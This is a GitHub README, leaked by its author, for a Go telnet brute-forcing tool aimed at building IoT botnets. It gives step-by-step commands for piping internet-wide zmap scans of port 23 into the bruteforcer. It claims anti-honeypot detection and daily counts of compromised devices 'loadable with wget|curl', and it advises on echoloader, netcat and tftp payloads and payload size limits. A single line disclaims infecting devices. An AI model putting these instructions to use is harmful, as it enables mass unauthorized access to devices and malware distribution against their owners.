NoSpacesFlies/Telnet-Bruteforcer
GitHub: NoSpacesFlies/Telnet-Bruteforcer
Stars: 3 | Forks: 1
# Information & video preview
[](https://www.youtube.com/watch?v=jopqMKU3oVw)
- Discord accounts: `bombmanalt (CURRENT)` `dicorder` `daylight911`
- My telegram channel: https://t.me/flylegit
- Personal: @FuckIsra3l
## Why did i upload this?
- **It was private for me and a friend until he sold it, and just like every product that gets sold, credit stolen off me and it will get leaked anyway, just a matter of time, so i'm gonna leak it and benefit some telegram channel members ;)**
- i take credit of any leaked listener/dlr version with this.
## Notes:
- DO NOT Infect devices with this, im not responsible for whatever the fuck you do
- THIS DOES NOT INCLUDE BASELOADER (LISTENER)
- THIS DOES NOT INCLUDE A LOADER FOR THE HITS YOU GET
- Do not add credentials with `@ or # or $`, its not supported
## What makes this so special?
- It has 100% correct anti honeypot detection, not a single honeypot will pass
- Gets 100% real busyboxes
- Its not old mirai bruter bs
## Hitrate
- With a 3.4MP/S Zmap scanning speed, you can make about 1400+ Telnets daily (or even more)
- Out of 1400+ telnets, there will be atleast 240 loadable with wget|curl
- ftp:ftp|guest:guest credential telnets are not all readonly
- for more results of the 1400 use an echoloader or telnet/netcat payload or ftp+tftp+ftpget or just use all
- payload should not pass 1kb, if bigger split it or you will get session close
# Tutorial (Ubuntu|Debian)
- Upload telbrute.go in an empty directory (recommended)
- `apt update -y && apt upgrade -y`
- `apt install zmap -y`
- `apt install golang -y` |OR| `snap install go --classic` (recommended)
- `go build telbrute.go`
- `zmap -p 23 -q | ./telbrute -port 23`
# Tutorial (Redhat)
- Upload telbrute.go in an empty directory (recommended)
- `yum update -y` (If zmap|go packages not found, you can skip this unless you get an error)
- `yum install zmap -y`
- `yum install golang` |OR| `yum install go -y`
- `go build telbrute.go`
- `zmap -p 23 -q -r0 -T4 | ./telbrute -p 23`
标签:EVTX分析